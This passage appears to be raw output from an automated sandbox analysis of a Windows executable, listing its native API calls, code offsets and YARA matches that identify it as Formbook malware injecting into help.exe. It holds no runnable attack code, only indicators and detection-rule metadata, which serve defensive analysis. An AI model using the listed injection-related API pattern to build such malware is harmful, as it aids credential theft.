          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00419F30 NtCreateFile,2_2_00419F30
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00419FE0 NtReadFile,2_2_00419FE0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041A05A NtClose,2_2_0041A05A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041A10A NtAllocateVirtualMemory,2_2_0041A10A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00419F2D NtCreateFile,2_2_00419F2D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C098F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00C098F0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09840 NtDelayExecution,LdrInitializeThunk,2_2_00C09840
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00C09860
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C099A0 NtCreateSection,LdrInitializeThunk,2_2_00C099A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00C09910
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09A50 NtCreateFile,LdrInitializeThunk,2_2_00C09A50
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00C09A00
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09A20 NtResumeThread,LdrInitializeThunk,2_2_00C09A20
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C095D0 NtClose,LdrInitializeThunk,2_2_00C095D0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09540 NtReadFile,LdrInitializeThunk,2_2_00C09540
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C096E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00C096E0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00C09660
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09780 NtMapViewOfSection,LdrInitializeThunk,2_2_00C09780
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C097A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00C097A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09710 NtQueryInformationToken,LdrInitializeThunk,2_2_00C09710
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C098A0 NtWriteVirtualMemory,2_2_00C098A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0B040 NtSuspendThread,2_2_00C0B040
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09820 NtEnumerateKey,2_2_00C09820
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C099D0 NtCreateProcessEx,2_2_00C099D0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09950 NtQueueApcThread,2_2_00C09950
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09A80 NtOpenDirectoryObject,2_2_00C09A80
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09A10 NtQuerySection,2_2_00C09A10
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0A3B0 NtGetContextThread,2_2_00C0A3B0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09B00 NtSetValueKey,2_2_00C09B00
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C095F0 NtQueryInformationFile,2_2_00C095F0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09560 NtWriteFile,2_2_00C09560
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09520 NtWaitForSingleObject,2_2_00C09520
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0AD30 NtSetContextThread,2_2_00C0AD30
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C096D0 NtCreateKey,2_2_00C096D0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09650 NtQueryValueKey,2_2_00C09650
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09670 NtQueryInformationProcess,2_2_00C09670
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09610 NtEnumerateValueKey,2_2_00C09610
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09FE0 NtCreateMutant,2_2_00C09FE0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09760 NtOpenProcess,2_2_00C09760
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09770 NtSetInformationFile,2_2_00C09770
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0A770 NtOpenThread,2_2_00C0A770
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0A710 NtOpenProcessToken,2_2_00C0A710
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09730 NtQueryVirtualMemory,2_2_00C09730
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A060 NtClose,2_1_0041A060
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A110 NtAllocateVirtualMemory,2_1_0041A110
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419F30 NtCreateFile,2_1_00419F30
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419FE0 NtReadFile,2_1_00419FE0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A05A NtClose,2_1_0041A05A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A10A NtAllocateVirtualMemory,2_1_0041A10A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419F2D NtCreateFile,2_1_00419F2D
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A50 NtCreateFile,LdrInitializeThunk,5_2_03669A50
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_03669910
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036699A0 NtCreateSection,LdrInitializeThunk,5_2_036699A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669860 NtQuerySystemInformation,LdrInitializeThunk,5_2_03669860
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669840 NtDelayExecution,LdrInitializeThunk,5_2_03669840
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669710 NtQueryInformationToken,LdrInitializeThunk,5_2_03669710
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669FE0 NtCreateMutant,LdrInitializeThunk,5_2_03669FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669780 NtMapViewOfSection,LdrInitializeThunk,5_2_03669780
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03669660
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669650 NtQueryValueKey,LdrInitializeThunk,5_2_03669650
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036696E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_036696E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036696D0 NtCreateKey,LdrInitializeThunk,5_2_036696D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669540 NtReadFile,LdrInitializeThunk,5_2_03669540
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036695D0 NtClose,LdrInitializeThunk,5_2_036695D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669B00 NtSetValueKey,5_2_03669B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366A3B0 NtGetContextThread,5_2_0366A3B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A20 NtResumeThread,5_2_03669A20
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A00 NtProtectVirtualMemory,5_2_03669A00
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A10 NtQuerySection,5_2_03669A10
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A80 NtOpenDirectoryObject,5_2_03669A80
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669950 NtQueueApcThread,5_2_03669950
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036699D0 NtCreateProcessEx,5_2_036699D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366B040 NtSuspendThread,5_2_0366B040
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669820 NtEnumerateKey,5_2_03669820
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036698F0 NtReadVirtualMemory,5_2_036698F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036698A0 NtWriteVirtualMemory,5_2_036698A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669760 NtOpenProcess,5_2_03669760
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366A770 NtOpenThread,5_2_0366A770
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669770 NtSetInformationFile,5_2_03669770
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669730 NtQueryVirtualMemory,5_2_03669730
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366A710 NtOpenProcessToken,5_2_0366A710
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036697A0 NtUnmapViewOfSection,5_2_036697A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669670 NtQueryInformationProcess,5_2_03669670
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669610 NtEnumerateValueKey,5_2_03669610
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669560 NtWriteFile,5_2_03669560
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669520 NtWaitForSingleObject,5_2_03669520
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366AD30 NtSetContextThread,5_2_0366AD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036695F0 NtQueryInformationFile,5_2_036695F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A110 NtAllocateVirtualMemory,5_2_0321A110
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A060 NtClose,5_2_0321A060
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219F30 NtCreateFile,5_2_03219F30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219FE0 NtReadFile,5_2_03219FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A10A NtAllocateVirtualMemory,5_2_0321A10A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A05A NtClose,5_2_0321A05A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219F2D NtCreateFile,5_2_03219F2D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040323C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_004048530_2_00404853
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_004061310_2_00406131
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_73761A980_2_73761A98
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041E2062_2_0041E206
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041DA322_2_0041DA32
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D3302_2_0041D330
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041E46E2_2_0041E46E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00409E402_2_00409E40
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D6662_2_0041D666
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00409E3C2_2_00409E3C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A02_2_00BF20A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C928EC2_2_00C928EC
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDB0902_2_00BDB090
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C920A82_2_00C920A8
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA8302_2_00BEA830
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C810022_2_00C81002
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9E8242_2_00C9E824
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE41202_2_00BE4120
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCF9002_2_00BCF900
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C922AE2_2_00C922AE
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7FA2B2_2_00C7FA2B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFEBB02_2_00BFEBB0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C803DA2_2_00C803DA
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8DBD22_2_00C8DBD2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C723E32_2_00C723E3
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFABD82_2_00BFABD8
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA3092_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C92B282_2_00C92B28
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAB402_2_00BEAB40
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C844962_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD841F2_2_00BD841F
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8D4662_2_00C8D466
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C925DD2_2_00C925DD
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF25812_2_00BF2581
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D822_2_00C82D82
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDD5E02_2_00BDD5E0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC0D202_2_00BC0D20
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C91D552_2_00C91D55
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C92D072_2_00C92D07
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C92EF72_2_00C92EF7
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE6E302_2_00BE6E30
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8D6162_2_00C8D616
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9DFCE2_2_00C9DFCE
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C91FF12_2_00C91FF1
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_004010302_1_00401030
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041E2062_1_0041E206
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041DA322_1_0041DA32
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D3302_1_0041D330
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041E46E2_1_0041E46E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00402D872_1_00402D87
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00402D902_1_00402D90
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00409E402_1_00409E40
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D6662_1_0041D666
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00409E3C2_1_00409E3C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00402FB02_1_00402FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364AB405_2_0364AB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F2B285_2_036F2B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E03DA5_2_036E03DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EDBD25_2_036EDBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365EBB05_2_0365EBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DFA2B5_2_036DFA2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F22AE5_2_036F22AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036441205_2_03644120
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362F9005_2_0362F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036FE8245_2_036FE824
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A8305_2_0364A830
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E10025_2_036E1002
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F28EC5_2_036F28EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036520A05_2_036520A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F20A85_2_036F20A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363B0905_2_0363B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F1FF15_2_036F1FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036FDFCE5_2_036FDFCE
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03646E305_2_03646E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036ED6165_2_036ED616
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F2EF75_2_036F2EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F1D555_2_036F1D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03620D205_2_03620D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F2D075_2_036F2D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363D5E05_2_0363D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F25DD5_2_036F25DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036525815_2_03652581
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036ED4665_2_036ED466
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363841F5_2_0363841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D3305_2_0321D330
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321DA325_2_0321DA32
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321E2065_2_0321E206
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03202FB05_2_03202FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03209E3C5_2_03209E3C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D6665_2_0321D666
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03209E405_2_03209E40
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03202D875_2_03202D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03202D905_2_03202D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321E46E5_2_0321E46E
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0362B150 appears 72 times
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: String function: 00BCB150 appears 133 times
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: String function: 0041BDB0 appears 38 times
          Source: SX365783909782021.exe, 00000000.00000003.208364508.0000000009C4F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SX365783909782021.exe
          Source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs SX365783909782021.exe
          Source: SX365783909782021.exe, 00000002.00000002.259254145.0000000000E4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SX365783909782021.exe
          Source: SX365783909782021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
